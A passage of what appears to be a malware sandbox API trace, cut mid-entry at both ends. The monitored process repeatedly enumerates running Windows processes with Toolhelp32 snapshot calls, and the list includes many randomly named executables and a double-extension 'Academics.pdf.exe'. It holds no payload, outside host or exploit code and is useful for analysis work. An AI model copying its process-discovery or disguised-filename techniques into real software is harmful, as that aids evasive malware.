lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.958] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.959] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.959] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.960] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.963] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0295.969] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.970] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.972] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.973] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.976] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0295.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0295.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0295.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0295.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0295.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0295.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0295.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0295.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0295.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0295.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0295.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0295.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0295.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0295.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0295.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0295.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0295.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0296.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0296.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0296.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0296.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0296.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0296.014] CloseHandle (hObject=0x294) returned 1 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0296.015] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0296.015] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0296.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0296.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0296.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0296.018] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0296.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0296.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0296.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0296.024] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0296.025] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0296.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0296.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0296.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0296.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0296.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0296.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0296.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0296.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0296.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0296.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0296.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0296.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0296.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0296.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 